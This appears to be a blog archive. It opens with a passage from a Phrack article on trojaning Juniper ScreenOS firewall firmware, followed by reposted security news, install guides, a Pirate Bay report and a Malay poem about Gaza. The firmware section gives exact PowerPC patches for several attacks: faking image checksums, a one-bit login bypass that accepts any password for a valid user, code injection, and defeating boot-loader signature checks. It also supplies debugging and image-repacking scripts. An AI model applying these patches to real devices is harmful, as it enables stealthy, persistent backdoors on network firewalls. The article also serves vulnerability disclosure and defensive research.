00000010: 004E6016 15100050 29808000 C72C15F7 <-CHECKSUM  The checksum is calculated as part of the image loading sequence and a disassembly of the relevant function is shown below...but on firmware loading any bad header checksum value is printed to the console with an error message.  If we binary modify the firmware to print out the correct checksum value we would have a 'checksum calculator' firmware which we can load modified firmware against to calculate valid checksums. So we don't have to calculate or reverse engineer the checksum algorithm. This checksum calculator firmware can be loaded over serial console and new images we need to calculate the checksum for are loaded over TFTP. The correct checksum will then be output to the console. This correct header value can then be inserted into the firmware header by direct hex editing of the image file.  With a correct checksum field we can now load modified images via tftp and the web interface.  Below is the ScreenOS code we need to modify to create a checksum calculator image.  008B60E4  lwz  %r4, 0x1C(%r31)   # %r4 contains header checksum 008B60E8  cmpw %r3, %r4          # %r3 contains calculated checksum 008B60EC  beq  loc_8B6110        # branch away if checksums matched 008B60F0  lis  %r3, aCksumXSizeD@h  # " cksum :%x size :%d\n" 008B60F4  addi %r3, %r3, aCksumXSizeD@l 008B60F8  lwz  %r5, 0x10(%r31) 008B60FC  bl   Print_to_Console  # %r4 is printed to console 008B6100  lis  %r3, aIncorrectFirmw@h  # "Incorrect firmware data" 008B6104  addi %r3, %r3, aIncorrectFirmw@l 008B6108  bl   Print_to_Console   If we replace   008B60E8  cmpw %r3, %r4         # %r3 contains calculated checksum  with   008B60EC mr   %r4,%r3          # print out calculated checksum  we have our checksum calculator firmware.  For interested readers two checksum algorithms were identified at addresses and reverse engineering of these is certainly possible.  One Bit{e} [ Access ] The most stealthy and elegant backdoor is to subvert the existing login mechanism. It may be possible to spawn a shell on another external port but this may be noticed from an external scan of the appliance and compromises the stealthiness of the trojaned firmware so further research into this was not carried out.  Serial console, Telnet, Web and SSH all compare password hashes and use the same function for that comparison. Additionally SSH falls back to password authentication if the client does not supply a key, unless password authentication has been explicitly disabled.  A one bit patch to the firmware provides a login with any password if a valid username is supplied.  003F7F04  mr    %r4, %r27 003F7F08  mr    %r5, %r30 003F7F0C  bl    COMPARE_HASHES   # does a string compare 003F7F10  cmpwi %r3, 0                # equal if match 003F7F14  bne   loc_3F7F24    # login fails if not equal (branch) 003F7F18  li    %r0, 2 003F7F1C  stw   %r0, 0(%r29) 003F7F20  b     loc_3F7F28   If we replace   003F7F10  cmpwi %r3, 0  # equal if match  with   0x397F30 cmpwi %r3, 1           # equal if they don't match  then any password EXCEPT a valid password will provide a login.  We could patch   003F7F14 bne   loc_3F7F24   # login fails if not equal (branch)  to   003F7F14 bl   loc_3F7F24   # login never fails (branch)  to allow any password with a valid username to work.   Infection [ Payload ]  The last step for our working trojan is to be able to inject code into the firmware. First we need to find somewhere to inject the code we want executed. The ScreenOS code section contains a block of nulls large enough to include useful functionality at address 0x0031b4ac to 0x0031b4b0  First we write our desired functionality in PowerPC assembly and replace a chunk of nulls with the hex values of the assembly opcodes.  The steps to execute this code are: - Patch a branch in ScreenOS to call our code - Run our injected code which can potentially call ScreenOS functions - Branch back to callee  This code can be injected at address 0x002BB4E0 in the firmware and called from the login function of ScreenOS:   003F7F04 mr      %r4, %r27      003F7F08 mr      %r5, %r30 003F7F0C bl      GET_HASHED_PASS # patch this to call our code 003F7F10 cmpwi   %r3, 0          003F7F14 bne     loc_3F7F24 003F7F18 li      %r0, 2 003F7F1C stw     %r0, 0(%r29) 003F7F20 b       loc_3F7F28  so  003f7f0c bl GET_HASHED_PASS  becomes  003f7f0c bl 0x31b4c0  which will jump to the location containing the injected code.  To inject code the PowerPC architecture features such as flat memory model, fixed width 4 byte instructions and the link register make this fairly straightforward to implement. A very simple proof of concept example, which prints out a string to the console on every login, is provided below:  stwu  %sp,  -0x20(%sp) # reserve some stack space mflr  %r0   # minimal function prolog lis   %r3,  string_msb_address # load half of string addi  %r3,  %r3,  string_lsb_address  # load second half of string bl    Print_To_Console # call ScreenOS function mtlr  %r0   addi  %sp, 0x20  #minimal function epilog bl    callee_function  # branch back to calling function  As PowerPC has a fix instruction size of 4 bytes to load a 4 byte string we need two instructions. The first loads the most significant bytes - 2 bytes for load instruction into register and 2 bytes of string, the second adds the least significant bytes to the register to give us 4 byte string.  This asssembly is then translated in hex and patched into the firmware using a hex editor at absolute address 0x002bb4e0 overwriting existing nulls bytes:  0x002bb4b0: 93DFCAC4 4BD48E69 80010014 7C0803A6 0x002bb4c0: 83C10008 83E1000C 38210010 4E800020 0x002bb4d0: 00000000 00000000 00000000 00000000 0x002bb4e0: 9421FFE0 7C0802A6 3C6000C4 386321BC <---- 0x002bb4f0: 488ED7E9 60630001 7C0803A6 38210020 injected code 0x002bb500: 480DCA31 00000000 00000000 00000000 ->
0x002bb510: 00000000 00000000 00000000 00000000

From reverse engineering we have identified a ScreenOS function which
prints strings to the console. So here we have new functionality injected
into the ScreenOS firmware which has new code but also calls builtin
ScreenOS functionality. The string loaded can be one already existing in
ScreenOS or a new one injected somewhere into the null byte area.

Every time a user logins the string will be output to the serial console.

--[ 0x9 - Zombie Loader

ScreenOS does include a facility to validate firmware images and all
Juniper firmware images are signed. Crucially though the validating
certificate is NOT installed by default on any Netscreen AND anyone with
administrator rights can delete and install the certifcate. To enable
firmware image authentication it is necessary to obtain the certificate
from the Juniper website and then upload the certificate to the device
using the following command:

save image-key tftp 129.168.0.40 image-key.cer

In the example above image-key is the certificate to be uploaded from the
tftp server with IP address 192.168.0.40. Note the insecure transport
mechanism for a cryptographic key. This is vulnerable to a man in the
middle attack.

The firmware authentication check code is present in the boot loader which
we can modify to authenticate all firmware images or only non-Juniper
images. It may also be possible to sign firmware with our own certificate
and upload this to the Netscreen to be used for validation.

Patching the Boot Loader to bypass certificate authentication.
To bypass the firmware authentication check only one branch instruction
needs to be patched:

beq -> bl   0x4182001C -> 0x4800001C

0000D68C  bl      sub_98B8
0000D690  cmpwi   %r3, 0      # %r3 has result of image validation
0000D694  beq     loc_D6B0    # branch if passed
0000D698  lis     %r3, aBogusImageNotA@h  # image not authenticated
0000D69C  addi    %r3, %r3, aBogusImageNotA@l
0000D6A0  crclr   4*cr1+eq
0000D6A4  bl      sub_C8D0
0000D6A8  li      %r31, -1
0000D6AC  b       loc_D6E0

If we replace

0000D694  beq     loc_D6B0    # branch if passed

with

0000D694 bl      loc_D6B0    # always branch, all images authenticated

or this

0000D694 bne     loc_D6B0    # evil...only bogus images authenticated

we can successfully load modified firmware even if a Juniper certificate
is installed on the device. The boot loader is automatically upgraded when
an image is loaded if the new boot loader differs from the existing.

In summary the steps to bypass firmware authentication are:

1. Delete certificate if one has been uploaded using the command:

ns5xt>delete crypto auth-key

2. Upload the modified firmware image including modified boot loader.

3. Upload the certificate using:

ns5xt>save image-key tftp 192.168.0.21 imagekey.cer

--[ 0xA - 28 Hacks Later

A more useful trojaned firmware can perform numerous functions leveraging
existing ScreenOS functionality such as
- loading a hidden shadow configuration file
- allowing all traffic from one IP through the Netscreen to the network
- a network traffic tap
- persistent infection via boot loader on a firmware upgrade
- client side attacks against Administrators via Javascript code injection
into the web console


--[ 0xB - Closing Scene

If unauthorised access is gained to a device running ScreenOS it is
possible for an attacker to replace the boot loader and operating system
with a modified version which is undetectable except by off line
comparison with a known image.

Juniper in-memory infection.

A very stealthy attack is also possible due to a feature of ScreenOS. When
loading a firmware over serial console two options are provided:
1. Save firmware to flash and then run new firmware.
2. Just run new firmware without saving to flash.

In the second case the modified firmware will be wiped on reboot and the
previously stored firmware will be run. After a reboot no trace of the
modified firmware will be left.

These attacks are straightforward for an attacker anywhere in the supply
chain (ie vendors. manufacturers) or someone with physical access (ie
third party support). If an administrator uses TFTP or HTTP to upgrade a
Netscreen it is also possible to conduct a man-in-the-middle attack and
replace the firmware being uploaded with a modified version on the wire.

These attacks could be prevented by Juniper pre-installing a certificate
for image authentication which can not be deleted or modified.


--[ 0xC - References

- Juniper JTAC Bulletin PSN-2008-11-111
ScreenOS Firmware Image Authenticity Notification
"All Juniper ScreenOS Firewall Platforms are susceptible to
circumstances in which a maliciously modified ScreenOS image can
be installed."

http://www.securelink.nl/nl/x/123/ScreenOS-Firmware-Image-Authenticity-
Notification

--[ 0xD - Credits
George Romero, antic0de, the belgian, hawkes, zadig, lenny, mark, andy,
ruxcon, kiwicon, +Mammon, +Orc


--[ 0xE Adddendum:

---------------------------------------------------------------------------
~/.gdbinit for remote PowerPC debugging
---------------------------------------------------------------------------
#--------------remote connect command over USB serial link-----------------
define netscreen
set height 0
set logging on
target remote /dev/ttyUSB0
end
#--------------------breakpoint aliases------------------------------------
define bpl
info breakpoints
end

define bpc
clear $arg0
end

define bpe
enable $arg0
end

define bpd
disable $arg0
end

#--------------------process information-----------------------------------
define stack
info stack
info frame
info args
info locals
end

define reg
  printf " r00:%08X r01:%08X r02:%08X r03:%08X", $r0, $r1, $r2, $r3
  printf " \t pc:%08X\n", $pc
  printf " r04:%08X r05:%08X r06:%08X r07:%08X\n", $r4, $r5, $r6, $r7
  printf " r08:%08X r09:%08X r10:%08X r11:%08X", $r8, $r9, $r10, $r11
  printf " \t lr:%08X\n", $lr
  printf " r12:%08X r13:%08X r14:%08X r15:%08X\n", $r12, $r13, $r14, $r15
  printf " r16:%08X r17:%08X r18:%08X r19:%08X", $r16, $r17, $r18, $r19
  printf " \tctr:%08X\n", $ctr
  printf " r20:%08X r21:%08X r22:%08X r23:%08X\n", $r20, $r21, $r22, $r23
  printf " r24:%08X r25:%08X r26:%08X r27:%08X", $r24, $r25, $r26, $r27
  printf " \t cr:%08X\n",$cr
  printf " r28:%08X r29:%08X r30:%08X r31:%08X", $r28, $r29, $r30, $r31
  printf " \txer:%08X\n", $xer
end

define func
info functions
end

define var
info variables
end

define lib
info sharedlibrary
end

define sig
info signals
end

define threadice
info threads
end

define u
info udot
end

define dis
disassemble $arg0
end


#------------------------------hex/ascii dump address----------------------
define hexdump
  printf "%08X : ", $arg0
  printf "%02X %02X %02X %02X  %02X %02X %02X %02X", *(unsigned char*) /
($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /
*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), *(unsigned char*)/
($arg0 + 5),*(unsigned char*)($arg0+6), *(unsigned char*)($arg0 + 7)
  printf " - "
  printf "%02X %02X %02X %02X  %02X %02X %02X %02X",*(unsigned char*) /
($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10), /
*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), /
*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /
*(unsigned char*)($arg0 + 15)
  printf " %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",*(unsigned char*)($arg0),/
*(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /
*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), /
*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), /
*(unsigned char*)($arg0 + 7),*(unsigned char*)($arg0+8), /
*(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/
*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), /
*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /
*(unsigned char*)($arg0 + 15)
end

#------------------------------hex dump address---------------------------
define memdump
printf "%02X%02X%02X%02X%02X%02X%02X%02X", *(unsigned char*)/
($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /
*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), /
*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), /
*(unsigned char*)($arg0 + 7)
  printf "%02X%02X%02X%02X%02X%02X%02X%02X\n",*(unsigned char*)/
($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/
*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12),/
*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14),/
*(unsigned char*)($arg0 + 15)
end


#----------------------------process context-------------------------------
define context
printf "\n"
printf "powerpc\n"
printf "---------------------------------"
printf "--------------------------------------[regs]\n"
reg
printf "\n"
printf "[%08X]---------------------", $r1
printf "--------------------------------------[stack]\n"
hexdump $r1+64
hexdump $r1+48
hexdump $r1+32
hexdump $r1+16
hexdump $r1
hexdump $r1-16
hexdump $r1-32
hexdump $r1-48
hexdump $r1-64
printf "\n"
printf "[%08X]---------------------", $pc
printf "----------------------------------[code]\n"
x /16i $pc
printf "---------------------------------"
printf "-------------------------------------\n"
end


#--------------------------process control---------------------------------
define n
  ni
  context
end

define c
  continue
  context
end

define go
  stepi $arg0
  context
end

define goto
  tbreak $arg0
  continue
  context
end

define pret
  finish
  context
end

define startice
  tbreak _start
  r
  context
end

define main
  tbreak main
  r
  context
end

define find
  set $start = (char *) $arg0
  set $end = (char *) $arg1
  set $pattern = (int) $arg2
  set $p = $start
  while $p < $end  if (*(int *) $p) == $pattern      printf "pattern 0x%x found at 0x$x\n", $pattern, $p  end     set $p++    end end  #--------------------------gdb options------------------------------------- set confirm 0 set verbose off set prompt gdb-ppc>
set output-radix 0x10
set input-radix 0x10


---------------------------------------------------------------------------
ScreenOS pack & unpack python scripts
---------------------------------------------------------------------------
#!/usr/local/bin/python
#
# nodunpack.py :: ScreenOS image unpacker
#
#
# IMPORTANT:
# requires LZMA utilities
#
import sys
import subprocess

class sosunzip:

  def init():
      self.header
      self.image
      self.packed
self.out

  def unpack(self):

print "Cutting off header and saving"
f = open(self.packed, 'rb')
fh = file(self.header, 'w+b')
fb = file(self.image, 'w+b')

# save header including 4 magic bytes for lzma blob
head = f.read(0x00012c04)
fh.write(head)
fh.close()
print "Header extracted"

# save lzma blob
f.seek(0x00012c04)
blob = f.read()
fb.write(blob)
f.close()
fb.close()
print "lzma blob extracted"

# fast way
# fb = open(self.image, 'r+b')
# buf = fb.read().replace(oldhead,newhead)
# fb.seek(0x0)
# fb.write(buf)
# fb.close()

# correct dictionary size
fb = open(self.image, 'r+b')
fb.seek(0x01)
print "Correcting dictionary size 00008000"
fb.write(chr(0x00) + chr(0x00) + chr(0x80) + chr(0x00))

# read header and lzma blob
fb.seek(0x0)
head = fb.read(0x05)
fb.seek(0x05)
lzma = fb.read()

# write outheader, unknown size and lzma blob
fb.seek(0x00)
fb.write(head)
print "Adding uncompressed size: 0xffffffffffffffff"
fb.write(chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr /
     (0xff)+chr(0xff)+chr(0xff))
fb.write(lzma)
fb.close()

print ("Uncompressing LZMA blob...")
mkimage = "".join(['lzcat ',self.image,' > ',self.out])
subprocess.call(mkimage, shell=True)
print "lzcat: Blob decompressed (decoder error is safe to ignore)"
print "ScreenOS image file decompressed"

if __name__ == '__main__':

  if len(sys.argv) != 4:
print "Usage: ./sunpack.py   "
sys.exit(1)
  else:
s = sosunzip()
s.packed = sys.argv[1]
s.header = sys.argv[2]
s.out = sys.argv[3]
s.image = "".join([sys.argv[3],'.lzma']) 
s.unpack()

  sys.exit(0)


#!/usr/local/bin/python
#
# nodpack.py :: ScreenOS image packer
#
#
# IMPORTANT:
# requires LZMA utilities installed!
#
import sys
import subprocess

class soszip:

  def init():
      self.header
      self.image
      self.packed

  def pack(self):

print ("Compressing with LZMA...")
mklzma = "".join(["lzma", " -5 ",self.image])
subprocess.call(mklzma,shell=True)

print("Adding header to LZMA blob...")
mkimage = "".join(['cat ',self.header,' ',self.image,'.lzma > /
      ',self.packed])
subprocess.call(mkimage, shell=True)

print "Fixing dictionary size 0x00012c05: 00008000 -> 00200000"
f = open(self.packed, 'r+b')
f.seek(0x00012c05)
f.write(chr(0x00)+ chr(0x20) + chr(0x00)+ chr(0x00))
#seek to start of file
f.seek(0x0)
head = f.read(0x00012c09)
print "Removing uncompressed size 0x00012c09: [8 bytes]"
#seek past the field to remove
f.seek(0x00012c11)
bub = f.read()
# rewrite the file
f.seek(0x0)
f.write(head)
f.write(bub)
f.truncate()
f.close()

print "ScreenOS image file created"

if __name__ == '__main__':

  if len(sys.argv) != 4:
print "Usage: ./nodpack.py   "
sys.exit(1)
  else:
s = soszip()
s.header = sys.argv[1]
s.image = sys.argv[2]
s.packed = sys.argv[3] 
s.pack()

  sys.exit(0)

--------[ EOF

source: phrack

Windows XP ATM's Under Hacker Attacks

2009-06-05T10:22:00.002+08:00

There have been approximately 20 ATM's in Eastern Europe that have been compromised. These attacks are in the early stages of development and would probably gain momentum and even spread to US ATM machines.

A security outfit, TrustWave's SpiderLabs performed the analysis of malware found installed on compromised ATMs in the Eastern European region. The ATM's that were compromised ran Microsoft Windows XP. The malware captures magnetic stripe data and PIN codes from the private memory space of transaction-processing applications installed on infected ATM.

The attacker can gain full control of the infected ATM through a customized user interface built into the malware. This is accomplished by inserting a controller card into the ATM's reader.

TrustWave's analyses don't believe the malware has networking functionality that would send data to other, remote locations over the Internet. The malware would output the harvested data through the ATM's receipt printer or write the data to a storage device inserted into the ATM's card reader.

TrustWave stated; "this malware is unlike any we have ever had experience with. It allows the attacker to gain complete control over the ATM to obtain track data, Pins and cash from each infected machine."

"We believe the current attack vector is an early version of the malware sample, and future attacks will add functionality such as propagation via the ATM network. If an attacker can gain access to one machine, the malware will evolve and propagate automatically to other systems."

A dropper file named isadmin.exe, is installed into the ATM and executed within the C:\WINDOWS directory of the compromised machine. The malware then proceeds to control the Protected Storage service that would handle the original lsass.exe executable file, located in the C:\WINDOWS\system32 directory, to point to the infected file.

The malware is designed to remain active in the event the ATM crashes and has to restart.

source: physorg

svn metasploit on windows

2009-05-14T21:26:00.006+08:00

One
* Download latest tortoisesvn
* Create a directory with any name (ex: metasploit)
* Checkout latest metasploit version by using http://metasploit.com/svn/framework3/trunk/
* Download ruby packaged by One-Click Ruby Installer Project.
* ruby185-22.exe is recommended for this example.
* Install it in any directory

Two
* Download Ruby/GTK2 binaries for Windows.
* ruby-gnome2-0.16.0-1-i386-mswin32.exe is recommended for this example.
* Execute it. Basically, you don't need to change any settings. There are three points you can set it by yourself.

GTK2 Runtime: If you have your own GTK2 binaries(and the bin-path is added to PATH), you may check off this option. But it is heavily recommended to check on this option.
Register Environment Variables: The GTK2 Runtime bin-path is added to PATH. If you want to use tools such as msginit, msgmerge, etc ..., this option is useful. But if you don't need them, you shouldn't check this option. Especially, if you have some other GTK2 applications, it may causes any DLL conflicts.
Choose the install directory: Note that you need to choose the ruby-install-dir (Ex: c:\Ruby).

Three
* Time to test it.
* The following commands should be typed on the "Prompt for DOS". To open the Prompt for DOS on:

C:\>ruby -v
ruby 1.8.0 (2003-05-26) [i386-mswin32]

C:\>ruby -e "require 'gtk2'"

C:\>ruby -rgtk2 -e "Gtk::Window.new.show;Gtk.main"

* If it didn't return any error, it's done.

Truecrypt Installation on Fedora 10

2009-04-27T15:34:00.007+08:00

TrueCrypt 6.1 on Fedora 10 was quite straightforward. Here is a quick list of steps to follow:

1. Download the TrueCrypt 6.1 source tarball from www.truecrypt.org

2. Untar the source:
[root@slash-the Download]# tar -zxvf TrueCrypt\ 6.1a\ Source.tar.gz

3. Install required libraries:
[root@slash-the Download]# yum install nss-pkcs11-devel fuse-devel wxGTK wxGTK-devel gnome-keyring-devel gcc-c++

4. Export the Cryptoki include folder:
[root@slash-the Download]# export PKCS11_INC=/usr/include/gp11

5. Run make
You may get the following error messages:
../Common/SecurityToken.cpp:654: error: ‘CKR_NEW_PIN_MODE’ was not declared in this scope
../Common/SecurityToken.cpp:655: error: ‘CKR_NEXT_OTP’ was not declared in this scope

5.1 Open Common/SecurityToken.cpp in your favourite editor.

5.2 Scroll to line 654

5.3 Comment out line 654 and 655. It should look like this:
// TC_CASE_STR (CKR_NEW_PIN_MODE);
// TC_CASE_STR (CKR_NEXT_OTP);

5.4 Save and exit

5.5 Run make again

6. TrueCrypt is now compiled:
[root@slash-the Download]# cp Main/truecrypt /usr/share/bin

Cisco puts more security in the cloud

2009-04-22T14:31:00.003+08:00

SAN FRANCISCO--Cisco is set to make several cloud-related security announcements at the RSA conference on Tuesday, including the expansion of its hosted security services and the integration of security-as-a-service applications with corporate network infrastructures.

The new products include Cisco Security Cloud Services, Cisco IPS Sensor Software 7.0 for intrusion prevention, and Cisco Adaptive Security Appliance 5500 Series 8.2 software with a botnet traffic filter for identifying infected clients and remote access capabilities.

The company uses what it calls "SensorBase," a massive threat-monitoring network overseen by 500 workers in its Cisco Security Intelligence Operations center. The center collects data from 7,000 devices and hundreds of millions of client computers, providing snapshots of activity at different times and locations that can indicate if a large attack is going on, said Ambika Gadre, director of product marketing in the security technology business unit at Cisco, during a briefing on Monday.

The company also is announcing Cisco SAFE, a security reference architecture organizations can use as a guideline for deploying security solutions, and Cisco Information Technology Governance, Risk Management and Compliance consulting services.

In addition, Cisco is introducing the Cisco WebEx Collaboration Cloud for software-as-a-service, a network to provide high performance and security for conferencing, instant messaging and other enterprise work group activities. Also new is the Cisco WebEx Node for ASR 1000 Series, which allows the edge router to act as a point of presence in a corporate network for online meetings.

As confusing as it may be to keep the separate announcements straight, one analyst said Cisco's overall security strategy is a good one.

"There's been a rejuvenation of security at Cisco. They've had a hard time dealing with big picture things," said Peter Christy, principal of the Internet Research Group. "Their long-term vision is that security migrates with you" through the cloud.

Patrick Peterson, a security researcher at Cisco, described some of the threats facing corporations, including cybercriminals based in Russia and the Ukraine.

"They are the Bill Gates of cybercrime," because they are tech savvy and have an innovative entrepreneurial sense, he said.

SOURCE: www.cnet.com

The Great Brazilian Satellite-Hack Crackdown

2009-04-21T11:55:00.002+08:00

CAMPINAS, Brazil — On the night of March 8, cruising 22,000 miles above the Earth, U.S. Navy communications satellite FLTSAT-8 suddenly erupted with illicit activity. Jubilant voices and anthems crowded the channel on a junkyard's worth of homemade gear from across vast and silent stretches of the Amazon: Ronaldo, a Brazilian soccer idol, had just scored his first goal with the Corinthians.

It was a party that won't soon be forgotten. Ten days later, Brazilian Federal Police swooped in on 39 suspects in six states in the largest crackdown to date on a growing problem here: illegal hijacking of U.S. military satellite transponders.

"This had been happening for more than five years," says Celso Campos, of the Brazilian Federal Police. "Since the communication channel was open, not encrypted, lots of people used it to talk to each other."

The practice is so entrenched, and the knowledge and tools so widely available, few believe the campaign to stamp it out will be quick or easy.

Much of this country's geography is remote, and beyond the reach of cellphone coverage, making American satellites an ideal, if illegal, communications option. The problem goes back more than a decade, to the mid-1990s, when Brazilian radio technicians discovered they could jump on the UHF frequencies dedicated to satellites in the Navy's Fleet Satellite Communication system, or FLTSATCOM. They've been at it ever since.

Truck drivers love the birds because they provide better range and sound than ham radios. Rogue loggers in the Amazon use the satellites to transmit coded warnings when authorities threaten to close in. Drug dealers and organized criminal factions use them to coordinate operations.

Today, the satellites, which pirates called "Bolinha" or "little ball," are a national phenomenon.

"It's impossible not to find equipment like this when we catch an organized crime gang," says a police officer involved in last month's action.

The crackdown, called "Operation Satellite," was Brazil's first large-scale enforcement against the problem. Police followed coordinates provided by the U.S. Department of Defense and confirmed by Anatel, Brazil's FCC. Among those charged were university professors, electricians, truckers and farmers, the police say. The suspects face up to four years and jail, but are more likely to be fined if convicted.

SOURCE: http://www.wired.com

Should We Reward Hackers for Finding Flaws?

2009-04-20T09:58:00.002+08:00

Dr. Charlie Miller, famous Mac hacker, announced at this year's CanSecWest hacking contest that he would no longer be releasing exploits for free, to the vendor or anyone else. Further, Charlie and a few friends have started a "No More Free Bugs" campaign, which even has its own logo.

I've met and very much respect Charlie Miller, and I believe his intentions are good. He just wants to make a living doing what he is good at. The services he provides are valuable, to the software vendor and to us all. Still, I'm bothered by one nagging question: Will or won't Charlie sell his bug findings to parties with malicious intentions? He hasn't yet made a clear, definitive statement on that. I suspect he won't, but for now, I don't know for sure.

(It took Charlie Miller only 10 seconds to crack the Mac at CanSecWest. Now he says he's found a way to trick the iPhone into enabling shell code.)

I feel for Charlie and other truly elite, well-intentioned hackers like him. I've met many of them over the last 20 years, and I know that discovering vulnerabilities isn't the easiest way to make a living. I've known talented hackers who provided independently found exploits to the vendor and were offended when the vendor didn't want to pay them for their hard work. I've seen these initially well-intentioned hackers begin multiyear vendettas against the vendor, who they purportedly wanted to work for, by announcing bug after bug in retaliation. I've seen scorned hackers sell bugs to competitors and beat up the vendor in the press.

Penny in a haystack

Selling exploits is a money-making opportunity like never before, especially if you're a black hat. A hacker that doesn't care who gets his exploit can sell a decent vulnerability finding for a widely distributed software program for $5,000 or more. Prices on the black market are hard to find, but I've seen offers for up to $100,000 for a remote buffer overflow exploit against Windows Server 2003. Considering that multiple crimeware syndicates are making tens of millions of dollars, or more, a price of tens of thousands of dollars for a well-coded exploit is pretty cheap in the grand scheme of things.

Even in the white hat world, many legitimate parties are paying for bugs and exploits. First, many vendors (including my full-time employer, Microsoft) pay millions to internal and external bug finders, although they are almost always (if not always) contracted before the bugs are found. CanSecWest and other hacking contests pay for new zero-day vulnerabilities. Several other organizations, like the Zero Day Initiative, pay for new vulnerability findings. They make their money on the back end by selling protection products to their clients. Lastly, it's a poorly kept secret that our government has huge teams of people working on finding exploits for offense and defense purposes. There have even been attempts at open-air vulnerability auctions.

Black and white

The sad fact is that a found exploit doesn't earn the white hat hacker nearly as much money as the same exploit would bring in the black hat market. That's because white hat hacking is about fixing the product and protecting people, while black hat hacking is about separating people from their money. A friend of mine at a large software company did an analysis of the company's spending for internal and externally hired vulnerability finders, and he said the money paid often worked out to less than $25 per found bug. It's hard for any legitimate hacker to make a decent living at those wages.

But they do. I guess that's it in a nutshell. There are lots of ways to make money in this world. My computer books would sell a lot more if they contained porn, or I could supplement my income with tax-free money by selling illegal drugs, but I've got to be able to look at myself in the mirror in the morning and be proud of what I'm doing. I get paid to hack, but I've never done it without permission or with ill will toward anyone. Whatever personality trait takes to be involved with something malicious, it's missing from my DNA.

Many companies make a decent if not robust living finding bugs for vendors. Maybe they aren't making $5,000 or more per bug, but they've built successful -- sometimes highly successful -- businesses doing it the right way. They've become industry names and created individual stars. Their owners have grown the company, created long-term careers for their employees, and are able to hold their heads up high without a moment of second-guessing.

For every infamous black hat hacker, I can name two infamous white hat hackers and their companies -- names such as @Stake, ZDI, iDefense, David Litchfield, Foundstone, Dave Aitel, Immunity, and so many more.

Charlie and other "No More Free Bugs" advocates deserve to make a living doing what they do best. But I hope they consider the types of people and companies they will be selling their bugs to. We need them to assure us that they are on our side every time.

For more IT analysis and commentary on emerging technologies, visit InfoWorld.com. Story copyright © 2007 InfoWorld Media Group. All rights reserved.

source: PCWORLD

Pirate Bay Team Sentenced to Jail

2009-04-20T09:54:00.001+08:00

A Swedish court has found the four men behind file-sharing site The Pirate Bay guilty of infringing copyright law, sentencing them to a year each in jail and ordering them to pay £3 million ($4.5 million) in damages to 17 entertainment companies including Warner Bros (TWI), Sony Music Entertainment (SNE), EMI and Columbia Pictures. The media companies had been seeking $17.5 million.

Despite the verdict, The Pirate Bay remains open for business — that is, the non-commercial business of pointing users to content, but not hosting it, which its lawyers contend is legal. Though entertainment companies are cheering the victory, it doesn’t seem like it will have any direct effect on the more than 20 million people who use The Pirate Bay.

The folks behind The Pirate Bay — founders Gottfrid Svartholm Warg and Fredrik Neij, spokesman and programmer Peter Lunde, and funder Carl Lundström — were hardly stony-faced about being convicted, and said they would appeal and don’t plan to pay the fine. Here’s an archive video of this morning’s exceedingly casual press conference, and The Pirate Bay’s Peter Sunde as quoted by the BBC:

“It’s so bizarre that we were convicted at all and it’s even more bizarre that we were [convicted] as a team. The court said we were organised. I can’t get Gottfrid out of bed in the morning. If you’re going to convict us, convict us of disorganised crime.

“We can’t pay and we wouldn’t pay. Even if I had the money I would rather burn everything I owned, and I wouldn’t even give them the ashes.”

For background on the proceedings, see our pieces The Definitive Primer to the Pirate Bay Trial and So What’s Really Going on With That Pirate Bay Trial?.

source: CNN

Researchers unveil persistent BIOS attack methods

2009-03-25T22:37:00.001+08:00

Apply all of the browser, application and OS patches you want, your machine still can be completely and silently compromised at the lowest level--without the use of any vulnerability.

That was the rather sobering message delivered by a pair of security researchers from Core Security Technologies in a talk at the CanSecWest conference on methods for infecting the BIOS with persistent code that will survive reboots and reflashing attempts. Anibal Sacco and Alfredo Ortega (above) demonstrated a method for patching the BIOS with a small bit of code that gave them conplete control of the machine. And the best part is, the method worked on a Windows machine, a PC running OpenBSD and another running VMware Player.

"It was very easy. We can put the code wherever we want," said Ortega. "We're not using a vulnerability in any way. I'm not sure if you understand the impact of this. We can reinfect the BIOS every time it reboots."

Sacco and Ortega stressed that in order to execute the attacks, you need either root privileges or physical access to the machine in question, which limits the scope. But the methods are deadly effective and the pair are currently working on a BIOS rootkit to implement the attack.

"We can patch a driver to drop a fully working rootkit. We even have a little code that can remove or disable antivirus," Ortega said.

The work by the Core team follows on to research done on persistent rootkits by John Heasman of NGSS, who was able to devise a method for placing rootkits on PCs using the memory space on PCI cards. In a presentation at Black Hat DC in 2007, Heasman showed a completely working method for loading the malware on to a PCI card by using the flashable ROM on the device. He also had a way to bypass the Windows NT kernel and create fake stack pointers.

In an interview at the time, he told me: "At that point it's game over. We're executing 32-bit code in ring zero."

As application and operating system protection mechanisms continue to become more sophisticated and more difficult to evade, expect to see more and more attacks targeting the hardware and low-level software, where there are still opportunities for success.

source: threatpost blogs

Save Palestine

2009-02-06T00:39:00.002+08:00

Maghrib Khamis dibasuhnya baju
ampaian di luar jendela
Berinjak kakinya doakan rambulan
keringkan jemuran
Rindu hanya satu
esok solat jumaat
ingin doa mengadu diri yatim piatu

Ooo

Malam pun larut
Khan Younis terlena di pintu

Wooo

belum pun subuh
api menyambar
lebur kaca jendela
maut menceroboh
mayat masih di situ
jari merah kecil
erat menggenggam baju basah
airnya mandikan Gaza..

erat menggenggam baju basah
airnya mandikan Gaza...

Khan Younis
doamu tulus oooh
Khan Younis!

Apa bezanya, pacik..

2009-02-03T21:44:00.002+08:00

